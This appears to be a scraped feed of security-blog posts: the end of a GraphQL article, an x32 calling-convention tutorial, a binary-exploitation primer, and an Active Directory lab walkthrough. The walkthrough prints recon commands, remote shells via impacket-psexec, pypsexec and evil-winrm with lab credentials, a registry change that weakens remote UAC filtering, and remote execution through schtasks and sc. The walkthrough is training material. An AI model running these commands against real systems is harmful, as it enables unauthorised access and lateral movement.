Restful APIs, with their structured endpoints, offer clarity and organization, while GraphQL, the agile storyteller, wields the power of tailored data retrieval through a single endpoint. Both have their roles in the ever-evolving landscape of web applications.

From the detective work of recognizing APIs to the time-traveling journey of versioning, we&apos;ve uncovered the tools and techniques essential to becoming API maestros. The Introspection Query, akin to deciphering ancient scrolls, revealed the inner workings of GraphQL, with GraphQL Voyager as our linguistic key.

Our adventure serves as a testament to the relentless pursuit of knowledge in the digital age. As technology evolves, so too does our understanding of it. With APIs as our compass, we continue to chart new frontiers in the ever-expanding digital universe.

So, fellow explorers, may your API journeys be filled with discovery, mastery, and the thrill of unraveling the unknown. Onward to new horizons!

## References

[PayloadsAllTheThings/GraphQL Injection at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection)

[GraphQL Voyager](https://ivangoncharov.github.io/graphql-voyager/)

[How to exploit GraphQL endpoint: introspection, query, mutations &amp; tools - Global Bug Bounty Platform](https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/)</content:encoded><author>Ruben Santos</author></item><item><title>Dancing with Functions: Unraveling the Assembler Function Convention in x32</title><link>https://www.kayssel.com/post/binary-explotation</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-explotation</guid><description>Explore x32 function calling, the dance of frame pointers, and the ballet of call instructions. Each segment crafts an eloquent narrative in the intricate performance on the stack. Witness the artistry of assembly language unfold.</description><pubDate>Fri, 10 Feb 2023 11:22:47 GMT</pubDate><content:encoded># Introduction

Step into the intricate world of assembly language, where each instruction orchestrates a ballet of bytes and registers. In this exploration, we delve into the heart of the assembler function convention, uncovering the silent rules that govern the exchange of information within the stack. Get ready for a journey behind the scenes, from the dazzling entrance of functions to the graceful exit upon completion.

# Unlocking the Dance: Assembler Function Convention in x32

Imagine a function&apos;s frame as the stack&apos;s VIP lounge, reserved for arguments, local variables, and the return address. As functions step into the limelight, new frames join the party and gracefully exit upon completion. The stack&apos;s top, ever the socialite, adjusts dynamically, ensuring the current function takes center stage.

To paint a clearer picture, let&apos;s dissect a code snippet:

```c
void function_a(param_1, param_2) {
        int var_1 = 10;
        int var_2 = 11;
        funcion_b(arg_3, arg_4)
}
void function_b(param_3, param_4) {
        int var = 12;
        funcion_c(arg_5);
}
void function_c(param_5) {
        int var = 13;
}

int main() {
        funcion_a(arg_1, arg_2);
        printf(&quot;Message\n&quot;);
}

```

As the script unfolds, the stack elegantly transforms, each function adding its unique touch to the stack&apos;s haute couture.

![](/content/images/2023/02/functionconvention.png)

Display of the stack status once when the c function is executing

## Guiding the Dance: The Eloquent Frame Pointer (ebp, rbp)

In the mysterious world of compilation, the exact memory addresses of local variables or arguments remain hidden. Enter the `ebp` register—the Sherlock Holmes of function frames. This savvy register stakes out a fixed address within the function frame, providing a secret passage to various arguments or local variables. The subtraction of `ebp`&apos;s memory address is akin to finding the hidden door to access local variables, with the subtracted size dancing to the rhythm of the data type.

![](/content/images/2023/02/functionconvention-1-.png)

Sample of how to access arguments and local variables using ebp

## Onstage Elegance: Call Instructions and the VIP Lounge

Before a function makes its grand entrance, parameters and the return address are sipping on espresso cups in the stack&apos;s VIP lounge. The assembly instructions set the stage:

```nasm
push   0x2 
push   0x1
call   80483fb &lt;funcion_b&gt;

```

These instructions send two integers as parameters onto the stack and roll out the red carpet, with the `call` instruction ushering the execution to the specified address while keeping the return address on standby.

![](/content/images/2023/02/parameters.png)

Viewing from top to bottom, it shows how the arguments and return address are placed on the stack.

## Prologue Unveiled: Crafting the Frame with Grace

The prologue is the opening act, featuring instructions that tweak register values to create the function&apos;s frame. It&apos;s like the function&apos;s backstage pass:

```nasm
; prologue

push    ebp                                     
mov     ebp, esp   

```

Here, the instructions gracefully push the current `ebp` value into the limelight and set the stage for a new function frame based on the stack top.

![](/content/images/2023/02/prologue.png)

Stack sample once the prologue of a function has been performed

## Finale Choreography: The Artful Epilogue of a Function

As the final curtain gracefully descends, the epilogue steps into the limelight, guiding our program towards closure with these meticulous instructions:

```nasm
; epilogue

leave
ret

```

Now, let&apos;s pull back the curtain to reveal the inner workings of the leave instruction—it&apos;s akin to a carefully orchestrated set of moves:

```nasm
mov esp, ebp  
pop ebp       

```

In this encore performance, the leave instruction takes a bow by gracefully updating the stack top, aligning it with the value of `ebp` from the function that just concluded its act. Envision the backstage crew tidying up the set, ensuring every register and memory space returns to its initial state. Following this choreography, the pop instruction steps in, updating the value of `ebp` to the one stored in the prologue—a changing of the guard between functions.

![](/content/images/2023/02/leaveinstruction.png)

Sample leave instruction

On another note, the ret instruction assumes the role of the final bow in this symphony of instructions. It elegantly unstacks the return value from the stack, placing it in `eip` like the closing note of a musical piece. As the curtain falls, it also orchestrates the update of `esp` to reflect the new stack top, ensuring a seamless transition to the program&apos;s next act.

A key note to highlight: Once the caller function takes its final bow and exits the stage, `esp` undergoes yet another transformation, a dance routine dictated by the number of parameters graciously accepted by the function. For a visual, consider this code excerpt:

```nasm
call 80483fb
push esp,0x8

```

In this ballet, two integers, each occupying 4 bytes, gracefully ascend from the stack—a farewell gift from the calling function to the one that shared the limelight.

![](/content/images/2023/02/retinstruction.png)

Epilogue and unstacking function parameters

# Conclusion

As the curtain falls on our exploration of assembler functions, we reflect on the harmonious interplay of bytes and registers that brings program execution to life. These functions, akin to lead actors, leave behind an elegant and meticulous imprint on the stack. Remember that behind each execution lies a precise choreography defining the rhythm of the code, a dance that transforms the seemingly complex into a symphony of understanding.

# References

[Introducción · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/1-introduccion.html)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Windows Remote Secrets: Techniques and Tools for Unveiling Hidden Realms</title><link>https://www.kayssel.com/post/active-directory-3-windows-computers</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-3-windows-computers</guid><description>Explore Windows machines in Active Directory: From LDAP insights to SMB mastery, remote access tools like PsExec, Python&apos;s pypsexec, and WinRM empower seamless control and discovery within the Windows domain landscape</description><pubDate>Fri, 03 Feb 2023 12:15:20 GMT</pubDate><content:encoded># **Introduction: Unveiling Windows Secrets Remotely**

Embarking on the vast domain of Windows requires not only knowledge but also the right tools to uncover its secrets. In this article, you will dive into techniques and tools that will unlock the doors of Windows machines remotely, granting you access to valuable information and empowering you to execute commands with finesse.

From exploration through LDAP to deploying advanced techniques such as SMB usage and accessing through RDP, each section of this article will guide you through a discovery journey, revealing methods that go beyond the conventional. Get ready to become a master of remote connection in the Windows universe.

# Unlocking Windows Machine Secrets: A Journey through LDAP, NBTNS, and SMB

## LDAP exploration

Ever wondered how to unlock a treasure trove of information in an Active Directory domain? Well, one way is to dive into the NTDS (Active Directory database) using the LDAP (Lightweight Directory Access Protocol) protocol. It&apos;s like having a secret key to unlock doors, but in this case, you need a domain user to make it work. Imagine your Kali machine as a detective, equipped with the ldapsearch tool, sniffing out valuable clues.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ ldapsearch -H ldap://192.168.253.130 -x -LLL -W -D &quot;vaan@shadow.local&quot; -b &quot;dc=shadow,dc=local&quot; &quot;(objectclass=computer)&quot; &quot;DNSHostName&quot; &quot;OperatingSystem&quot;
Enter LDAP Password: 
dn: CN=DC-SHADOW,OU=Domain Controllers,DC=SHADOW,DC=local
operatingSystem: Windows Server 2019 Standard Evaluation
dNSHostName: DC-SHADOW.SHADOW.local

dn: CN=PC-BERU,CN=Computers,DC=SHADOW,DC=local
operatingSystem: Windows 10 Enterprise Evaluation
dNSHostName: PC-BERU.SHADOW.local

```

## **Navigating with NBTNS**

Picture this: you&apos;re on a quest to discover Windows machines, but don&apos;t have a domain user handy. Fear not! Enter the Netbios Name Services protocol (NBTNS), your trusty sidekick in this journey. Windows machines usually keep port 137 wide open, like a welcoming door. It&apos;s like having a window into their world, and guess what? Most of them don&apos;t even bother with a firewall on this port.

The beauty of NBTNS lies not just in its accessibility, but also in its power to translate IP addresses into hostnames. It&apos;s like having a translator in a foreign land. To embark on this discovery adventure, scripts like [nbtscan](https://github.com/charlesroelli/nbtscan) or [nbtstat](https://www.kali.org/tools/nbtscan/) become your virtual tour guides, revealing the hidden gems in the Windows landscape.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ nbtscan 192.168.253.0/24
Doing NBT name scan for addresses from 192.168.253.0/24

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.253.130  DC-SHADOW        &lt;server&gt;  &lt;unknown&gt;        42:5a:97:56:1e:f6
192.168.253.131  PC-BERU          &lt;server&gt;  &lt;unknown&gt;        1e:3a:58:0b:95:35
192.168.253.255	Sendto failed: Permission denied

```

## **Exploring SMB Magic**

Let&apos;s talk about unlocking the full potential of Windows machines in your domain, and my favorite method involves dancing with the Server Message Block (SMB) protocol. Picture it as a backstage pass to a concert; it uses port 445 and opens the door to a wealth of information. The secret sauce here? The NTLM authentication protocol, which adds an extra layer of access. Feel free to leverage tools like Nmap for this journey.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ sudo nmap --script smb-os-discovery 192.168.253.131  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-28 12:10 CET
Nmap scan report for 192.168.253.131
Host is up (0.000086s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 1E:3A:58:0B:95:35 (Unknown)

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Enterprise Evaluation 19045 (Windows 10 Enterprise Evaluation 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: PC-BERU
|   NetBIOS computer name: PC-BERU\x00
|   Domain name: SHADOW.local
|   Forest name: SHADOW.local
|   FQDN: PC-BERU.SHADOW.local
|_  System time: 2023-01-28T12:10:12+01:00

Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds

```

Additionally, we can employ Python, specifically the [Impacket](https://github.com/fortra/impacket) library, to get intel from the machines. The [SMBConnection](https://github.com/fortra/impacket/blob/master/impacket/smbconnection.py) class acts like your virtual tour guide, offering a backstage pass to information like operating systems and DNS names.

```python
In [1]: from impacket.smbconnection import SMBConnection
In [2]: conn = SMBConnection(&quot;192.168.253.131&quot;, &quot;192.168.253.131&quot;)
In [3]: conn.login(&quot;beruinsect&quot;, &quot;Password2&quot;)
In [4]: conn.getServerOS()
Out[5]: &apos;Windows 10.0 Build 19041&apos;

```

Important tip: Ensure your Domain Controller is up before launching connections; otherwise, the login may falter. Also, note that the Impacket class will spill more beans if we flirt with SMB version 1.

```python
In [1]: from impacket.smbconnection import SMBConnection, SessionError
IN [2]: from impacket.smb import SMB_DIALECT
In [3]: conn = SMBConnection(&quot;192.168.253.131&quot;, &quot;192.168.253.131&quot;, preferredDialect=SMB_DIALECT,)
In [4]: conn.login(&quot;vaan&quot;, &quot;Password1&quot;)
In [5]: conn.getServerOS()
Out[5]: &apos;Windows 10 Enterprise Evaluation 19045&apos;

```

In the code above, notice how we specifically identify the Windows 10 version in use. The term &quot;preferredDialect&quot; is our way of nudging the SMB version during the connection. If you peek into the Impacket SMB file, you&apos;ll catch references to &quot;NT LM 0.12.&quot; This version game is also played by tools like nmap to denote the SMBv1 era.

![](/content/images/2023/01/image-87.png)

Identify SMBv1 enabled computers with nmap

![](/content/images/2023/01/image-88.png)

How impacket names SMBv1

If you&apos;re looking to add some flavor to your exploration with SMBv1, take a detour to &apos;Turn Windows Features on or off &gt; SMB 1.0/CIFS File Sharing Support.&apos; This move is like tuning your instruments before a concert, preparing your machines for a rock-and-roll experience. Get ready to make them sing as you dive into the SMBv1 world!

![](/content/images/2023/01/image-85.png)

How to enable SMBv1

# Windows Machine Interaction: Remote Access Strategies and Tools

## **Unleashing Psexec Magic on Windows Machines**

Let&apos;s delve into a personal favorite: Psexec, the wizard&apos;s wand for remote code execution on Windows machines. This tool weaves its magic by sending your desired commands through Remote Procedure Call (RPC) and orchestrating the exchange of command input and output via SMB pipes. It may sound a bit mysterious, but fear not—I&apos;ll unravel the intricacies of these protocols in future articles.

**Before We Begin:** To perform Psexec on a machine, here&apos;s the golden rule: you must wield the powers of an administrator. Without these credentials, the gates to remote command execution remain firmly shut.

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ impacket-psexec Administrator@192.168.253.130  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 192.168.253.130.....
[*] Found writable share ADMIN$
[*] Uploading file HHRhnpKK.exe
[*] Opening SVCManager on 192.168.253.130.....
[*] Creating service xAaH on 192.168.253.130.....
[*] Starting service xAaH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;

```

### **Empowering Python: Psexec at Your Fingertips**

Now, let&apos;s bring the power of Python into the realm of Psexec with the [pypsexec](https://github.com/jborean93/pypsexec) module. It&apos;s like having a magical wand to implement remote code execution functionality. Witness the simplicity in action with this example:

```bash
In [1]: from pypsexec.client import Client
In [2]: c = Client(&quot;192.168.253.131&quot;, username=&quot;Administrator&quot;, password=&quot;P@$$w0rd!&quot;)
In [3]: c.connect()
In [4]: c.create_service()
In [5]: c.run_executable(&quot;cmd.exe&quot;, arguments=&quot;/c echo Hello World&quot;)
Out[6]: (b&apos;Hello World\r\n&apos;, b&apos;&apos;, 0)
In [7]: c.run_executable(&quot;cmd.exe&quot;, arguments=&quot;/c whoami.exe&quot;)
Out[8]: (b&apos;shadow\\administrator\r\n&apos;, b&apos;&apos;, 0)

```

### **Navigating Psexec Woes on Windows 10**

In the magical world of Windows 10, Psexec might throw a curveball, manifesting as the dreaded &quot;Access Denied&quot; error. Fear not, for a simple incantation can dispel this enchantment. To conquer this issue, we must create a key and set its value to 1 for &quot;LocalAccountTokenFilterPolicy.&quot;

```powershell
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

```

By uttering this command, we unlock the path to seamless Psexec execution on Windows 10 machines. The doors swing open, and you can now traverse the mystical realms without hinderance.

![](/content/images/2023/01/image-89.png)

Being able to perform psexec in Windows 10 

# **WinRM: Gateway to Remote Windows Management**

Behold WinRM, the beacon of remote command execution in the Windows realm! WinRM, short for Windows Remote Management, is an innate utility ready to serve. By default, it listens on port 5985 via TCP. While it graciously opens its doors on Windows servers, workstations like Windows 10 may keep it hidden, requiring a gentle summons.

To connect to our Domain Controller, envision your Kali machine as a conjurer wielding the [evil-winrm](https://github.com/Hackplayers/evil-winrm) tool:

```bash
┌──(rsgbengi㉿kali)-[~/tools]
└─$ evil-winrm -i 192.168.253.130 -u administrator -p &apos;P@$$w0rd!&apos; 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; whoami
shadow\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; 

```

In this mystical encounter, we use evil-winrm to establish a connection. The Windows console bows before our commands, echoing the identity of the administrator—truly a moment of triumph.

## **Empowering WinRM: Enabling the Unseen Forces**

Unlocking the potential of WinRM requires a ritual, especially on workstations like Windows 10. Execute the following commands, invoking the PowerShell spirits:

```powershell
PS C:\Users\Windows\system32&gt; Enable-PSRemoting –force
PS C:\Users\Windows\system32&gt; winrm quickconfig -transport:https
PS C:\Users\Windows\system32&gt; Set-Item wsman:\localhost\client\trustedhosts * 
PS C:\Users\Windows\system32&gt; Restart-Service WinRM

```

As the unseen forces stir, WinRM emerges, ready to heed your commands. To verify this mystical transformation, wield the &quot;Test-WSMan&quot; tool. If it responds with protocol information and the allowed version, the spell has been cast successfully.

![](/content/images/2023/01/image-90.png)

Verify that a machine supports WinRM

## **WinRS: Bridging Realms from Windows Machines**

Enter WinRS, a gateway connecting Windows machines across the digital expanse! If you find yourself amidst the Window&apos;s landscape, yearning to traverse its vast territories, WinRS is your trusty guide.

```powershell
winrs -r:http://192.168.253.130 -u:&lt;adminuser&gt; -p:&apos;&lt;password&gt;&apos; cmd

```

![](/content/images/2023/01/image-92.png)

Using winrs to connect to other Windows machines

With this incantation, WinRS beckons from your Windows machine, communicating with the remote realm at 192.168.253.130. The response echoes the esteemed Administrator, a testament to the seamless connection forged.

## **RDP: Unlocking Windows Realms Remotely**

Picture this: a remote gateway into the heart of Windows machines—the Remote Desktop Protocol (RDP). Whether you wield the default mstsc client on a Windows machine or opt for Linux companions like Remmina, the path to Windows domains is at your fingertips.

&lt;details&gt;
&lt;summary&gt;On Windows:&lt;/summary&gt;

```powershell
mstsc /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;IP&gt;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;For Linux adventurers embracing the xfreerdp:&lt;/summary&gt;

```bash
xfreerdp /d:domain /u:&lt;username&gt; /p:&lt;password&gt; /v:&lt;IP&gt;

```
&lt;/details&gt;


With RDP as your key, the digital gates swing open, revealing the Windows desktop. Navigate the graphical expanse remotely, unlocking the potential for seamless interactions.

## **Beyond Boundaries: AT and Schtasks**

In the realm of Windows command execution, AT and Schtasks emerge as tools of ancient wisdom. While AT, considered obsolete post-Windows 8, can still be summoned for remote command execution:

```cmd
at \\&lt;REMOTE-MACHINE&gt; HH:MM &lt;PROGRAM&gt;

```

Its successor, Schtasks, offers equal prowess for commanding both local and remote executions:

```cmd
schtasks /create /tn &lt;TASK-NAME&gt; /tr &lt;PROGRAM-TO-EXECUTE&gt; /sc once /st 00:00 /S &lt;REMOTE-PC&gt; /RU System

schtasks /run /tn &lt;TASK-NAME&gt; /S &lt;REMOTE-PC&gt;

```

Engage these tools judiciously, unraveling the ancient threads of command execution across Windows domains.

![](/content/images/2023/02/image.png)

Sample execution of schtasks

## **SC: Initiating Services Remotely**

In the arsenal of remote manipulation, SC stands tall. With this tool, service initiation becomes a mere whisper:

```cmd
sc &lt;\\Hostname&gt; create &lt;Name of the service&gt; binpath=&quot;cmd.exe /c path&quot; 
sc &lt;\\Hostname&gt; start &lt;Name of teh service&gt;

```

![](/content/images/2023/02/image-2.png)

Sample executoin of SC

![](/content/images/2023/02/image-1.png)

Sample of notepad background execution

Unleash SC strategically, and witness the initiation of services that echo across the Window&apos;s expanse.

# **Conclusions: Unleashing Remote Power in the Windows Realm**

As you conclude this journey, you have unlocked an arsenal of techniques and tools that grant you the power to explore and control Windows machines remotely. Whether through LDAP reconnaissance, SMB protocol mastery, or sophisticated RDP maneuvers, you now possess the knowledge to navigate the intricate landscape of Windows with confidence and expertise. The realm is yours to command.

# References

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[WinRM Penetration Testing - Hacking Articles](https://www.hackingarticles.in/winrm-penetration-testing/)</content:encoded><author>Ruben Santos</author></item><item><title>Embarking on the Exploration: Fundamentals of Binary Exploitation on Linux</title><link>https://www.kayssel.com/post/explotation-1-assembly</link><guid isPermaLink="true">https://www.kayssel.com/post/explotation-1-assembly</guid><description>Introduction Embarking on a journey to unravel the intricacies of binary exploitation techniques, I&apos;m excited to share my experiences in this series. While it&apos;s admittedly one of the trickier topics to tackle, especially for beginners, I&apos;ve decided to take the plunge in 2023! 😅 My guide of choic...</description><pubDate>Fri, 27 Jan 2023 10:12:53 GMT</pubDate><content:encoded># Introduction

Embarking on a journey to unravel the intricacies of binary exploitation techniques, I&apos;m excited to share my experiences in this series. While it&apos;s admittedly one of the trickier topics to tackle, especially for beginners, I&apos;ve decided to take the plunge in 2023! 😅 My guide of choice is the remarkable [Nightmare](https://guyinatuxedo.github.io/) course, supplemented by additional resources listed below. So, let&apos;s dive into the fascinating world of binary exploitation!

# The compilation Process

The compilation process serves as the bridge, translating high-level language code like C into the machine&apos;s language—binary code. This binary language is a collection of instructions or operation codes (opcodes), essentially the commands that the processor follows and stores in memory.

![](/content/images/2023/01/conversiontypes.png)

Different ways of saying the same thing

To make these instructions more readable, we opt for a hexadecimal representation rather than the binary format. This switch to hexadecimal isn&apos;t just a technical choice; it&apos;s a practical one, enhancing the ease with which developers and analysts can work with and understand these instructions during the debugging or analysis stages.

![](/content/images/2023/01/memory.png)

Memory content

Now, let&apos;s talk about the fascinating evolution of code during this compilation journey. The high-level code transforms into something called assembly code. Think of assembly code as the machine&apos;s language, but presented in a way that we humans can grasp. It&apos;s like a bridge between our human-friendly code and the machine&apos;s binary instructions.

This brings us to the next step: assembling. It&apos;s the magical process where assembly code gets translated into opcodes, the fundamental building blocks of the executable program. This is where the transformation from readable instructions to the machine-understandable language truly takes shape.

![](/content/images/2023/01/compile-1-.png)

The compilation process

Various architectures operate with distinct assembly codes. In my exploration, I&apos;ll be delving into x64 bit and x32 bit ELF (Executable and Linkable Format) architectures. Adding to the richness of this journey, there are two primary assembler syntaxes in play: Intel and AT&amp;T.

Let&apos;s take a moment to appreciate the nuance between these syntaxes. In the Intel syntax, the target register takes the lead, listed first, while the source register follows—essentially the reverse of the AT&amp;T syntax. It&apos;s a subtle yet crucial distinction that sets the tone for how we communicate with the processor in these different assembly languages. This diversity adds a layer of complexity to the understanding of these architectures, making the exploration all the more intriguing!

# Registers

Registers, in the realm of computing, act as dedicated spaces where the processor can store both memory addresses and hexadecimal data to execute instructions—picture them as if they were the local variables of the processor. Within this intricate world, some registers serve specific functions, while others maintain a more general nature. The upcoming sections will delve into a detailed exploration of these registers, shedding light on their distinctive roles and functionalities as we progress through the article

![](/content/images/2023/01/registros-2-.png)

Registers summary

In the realm of x64 architectures, registers take on the role of handling function arguments. Each register has its designated purpose in this symphony:

-   rdi: First Argument
-   rsi: Second Argument
-   rdx: Third Argument
-   rcx: Fourth Argument
-   r8: Fifth Argument
-   r9: Sixth Argument

However, the scenario shifts when we dive into x32 architectures. Here, the stack becomes the messenger, carrying the burden of passing arguments to functions. It&apos;s worth noting that in languages like C, functions always yield some value. This returned value plays a pivotal role, with rax taking on the responsibility in x64 architectures and eax assuming the mantle in x32 architectures. It&apos;s a dance of registers and stacks, orchestrating the flow of information and results in the intricate world of function calls.

## Instruction Pointer (rip, eip)

Meet the Instruction Pointer, a crucial register that holds the key to the next chapter in the processor&apos;s script. Every time an instruction takes center stage, this register updates its value, pointing eagerly to the next instruction in line. Its journey involves increments, dictated by the size of the executed instruction.

Let&apos;s break it down with an example: consider the instruction &quot;add eax, 0x1,&quot; a snippet of elegance stored in memory as &quot;83 C0 01,&quot; occupying a humble 3 bytes. Post-execution, the Instruction Pointer steps forward by 3, gracefully guiding the processor to the next act in this computational ballet. It&apos;s a dance of bytes and pointers, choreographed by the rhythm of instructions.

![](/content/images/2023/01/eipregister.png)

## Size of registers

In the evolving landscape of computing architectures, a notable distinction between x32 and x64 systems emerges in the realm of register sizes. Picture registers as storage units for the processor, holding vital information for computation.

In the x32 realm, these registers have a cap at 4 bytes, reflecting the technology of its time. However, as we step into the more advanced x64 architectures, the registers double in size, boasting an expansive 8 bytes of storage capacity. This augmentation in register size signifies a technological leap, equipping processors with enhanced capabilities and paving the way for more sophisticated computing endeavors. It&apos;s a tangible manifestation of progress in the ever-evolving world of technology.

![](/content/images/2023/01/size-1.png)

Registers Size

As we navigate through this exploration, the terms &quot;word,&quot; &quot;dword,&quot; and &quot;qword&quot; will make frequent appearances, each carrying its own significance in the language of bytes.

In our lexicon, a &quot;word&quot; encapsulates 2 bytes, forming a compact unit of data. Stepping up in size, a &quot;dword&quot; extends to 4 bytes, providing a more substantial chunk of information. And finally, at the zenith of this byte hierarchy, a &quot;qword&quot; commands a generous 8 bytes, offering an expansive canvas for data storage.

These terms serve as our linguistic tools, allowing us to articulate and navigate the intricate tapestry of data in the digital realm. So, as we encounter &quot;words,&quot; &quot;dwords,&quot; and &quot;qwords,&quot; let&apos;s appreciate the nuanced palette they bring to our understanding of data sizes.

# The stack

Now, let&apos;s shine a spotlight on the stack—a dynamic region in the memory landscape that plays a pivotal role in every process. Think of the stack as a backstage crew, orchestrating data management with a Last In, First Out (LIFO) approach.

To interact with this backstage maestro, we employ two fundamental instructions: &quot;push&quot; and &quot;pop.&quot; &quot;Push&quot; gracefully adds elements to the stack, creating a neatly organized stack of data. Conversely, &quot;pop&quot; takes a bow as it elegantly removes elements, revealing the most recently added data.

Why does the stack take center stage? It serves as a temporary haven for data, housing everything from local variables and function parameters to return addresses. This intricate dance of push and pop ensures a seamless flow of information, a choreography vital to the performance of each process. It&apos;s the backstage magic that keeps the show running smoothly.

![](/content/images/2023/01/stack-1.png)

## Stack Pointer (rsp, esp)

Now, let&apos;s unveil the maestro behind the scenes—the Stack Pointer (rsp, esp). This register stands as the guardian of the stack, keeping track of the memory address at the very summit, where the last element resides.

Picture this: when a new member enters the stage through a &quot;push&quot; instruction, the Stack Pointer updates its address, ensuring it points to the newly welcomed guest. On the flip side, if the time comes for a graceful exit via a &quot;pop&quot; instruction, the Stack Pointer orchestrates the removal of the topmost element, storing its value in the designated register. As this dance unfolds, the Stack Pointer gracefully adjusts its address, synchronizing with the ebb and flow of the stack.

In the world of 32-bit architecture, this dance is captured in a visual spectacle, showcasing the interplay between instructions and the Stack Pointer. It&apos;s a mesmerizing ballet where addresses and values waltz in harmony, bringing order to the dynamic stage of memory management

![](/content/images/2023/01/push_pop.png)

Push and Pop instructions

Continuing the exploration of this memory-endian dance, let&apos;s delve into why &quot;push 0x100&quot; struts onto the stage as &quot;00 01 00 00&quot; in little-endian fashion. The magic lies in the computer&apos;s chosen method of storing data in memory.

Picture it like a carefully choreographed routine—little-endian style. The smallest memory address eagerly embraces the least significant byte, leading the procession up to the grand finale with the most significant byte taking its place.

This dance is a deliberate choice, optimizing memory storage and retrieval for the intricate performances that unfold within the computer&apos;s circuits. It&apos;s a reminder that in the digital realm, even the arrangement of bytes follows a choreography designed for efficiency and elegance.

![](/content/images/2023/01/littlevsbig.png)

Little-endian vs Big-endian

Now, let&apos;s shed light on how memory addresses gracefully guide us to the various cells adorned with data. Imagine this as a visual voyage, and to make it more accessible, let&apos;s turn to a simple yet illuminating diagram:

![](/content/images/2023/01/hexa.png)

memory address to data relation

In this visual narrative, each memory address serves as a map coordinate, pointing to a specific cell where data is elegantly stored. It&apos;s akin to navigating a grid, where the address acts as a guide, leading us to the precise location of the digital treasures.

This visual metaphor is our compass, helping us decipher the intricate language of memory addresses and their correlation with the rich tapestry of data. So, as we traverse the digital landscape, let this diagram be our trusted guide in understanding the spatial poetry of memory.

# Instructions

Let&apos;s step into the realm of instructions—a symphony of commands that govern the dance of binary code. While we&apos;ve touched on the graceful movements of &quot;push&quot; and &quot;pop,&quot; there&apos;s a whole ensemble of instructions awaiting our exploration when analyzing assembly code.

## Mov instruction

Meet the maestro, the &quot;mov&quot; instruction, orchestrating the art of data movement between registers. In its simplest form, it elegantly transfers data from the ebx register to the eax register, a seamless exchange in the processor&apos;s memory ballroom.

```nasm
mov eax, ebx
```

![](/content/images/2023/01/movinstruction-5-.png)

Sample of mov instruction

Yet, &quot;mov&quot; possesses a more nuanced choreography. It can also perform a pas de deux with data by employing what we call &quot;dereference.&quot; This term unveils a dance with memory addresses, guided by pointers. Imagine a pointer as a curator, pointing to data in the vast museum of memory. The syntax for this intricate dance is demonstrated below:

```nasm
mov eax, [ebx]
mov [ebx], eax

```

This dance of &quot;mov&quot; with dereference mirrors the way high-level languages access array data (like array\[3\]). It&apos;s a blend of elegance and functionality, enriching our understanding of how data twirls and pirouettes in the language of assembly.

![](/content/images/2023/01/movinstruction-4-.png)

Sample of deference

## Lea instruction

Introducing the &quot;lea&quot; instruction—a maestro specializing in loading memory addresses onto the stage. With a syntax reminiscent of a well-rehearsed routine:

```nasm
lea    eax,[ebx-0x4]

```

In the dance of assembly code, &quot;lea&quot; gracefully takes the memory address provided by the source register (here, ebx), twirls it with a specified offset (-0x4), and elegantly places it into the destination register (eax).

For those familiar with high-level languages like C, envision &quot;lea&quot; as a virtuoso akin to &quot;&amp;&quot; in function. It&apos;s a subtle yet powerful move, akin to taking the address of a variable in C, revealing the intricacies of memory navigation in the world of assembly.

![](/content/images/2023/01/leainstruction-1.png)

Sample of lea instruction

## Add instruction

Enter the &quot;add&quot; instruction—a virtuoso in the arithmetic ballet of assembly code. With a simple yet impactful syntax:

```nasm
add rax, rdx

```

In this elegant move, &quot;add&quot; takes the stored values from the rax and rdx registers, orchestrates a seamless addition, and then gracefully deposits the sum into the target register, here elegantly named rax.

It&apos;s a choreography of numbers, a ballet of bits, where the addition of registers becomes a harmonious performance, enriching the computational tapestry of the processor.

![](/content/images/2023/01/addinstruction.png)

Sample of add instruction

## Sub Instruction

Now, let&apos;s welcome the &quot;sub&quot; instruction to the stage—a luminary in the arithmetic theater of assembly code. Witness its graceful syntax:

```nasm
sub eax, ebx

```

In this intricate move, &quot;sub&quot; takes center stage by subtracting the value stored in the ebx register from that in the eax register. The result of this subtraction, a dazzling numerical difference, is then delicately deposited into the target register, here embodied as eax.

It&apos;s a performance of numerical finesse, a ballet of subtraction where registers gracefully interact, leaving behind a result that resonates in the computational symphony.

![](/content/images/2023/01/subinstruction.png)

Sample of sub instruction

## Jump instructions and flags

In the intricate realm of assembly, special instructions take the stage, wielding the power to modify the instruction pointer—the maestro guiding the flow of code execution. Let&apos;s spotlight two primary categories of jump instructions: the unwavering unconditional, like &quot;jmp&quot; and &quot;call,&quot; and the nuanced conditional, such as &quot;je&quot; or &quot;jne.&quot;

![](/content/images/2023/01/jump.png)

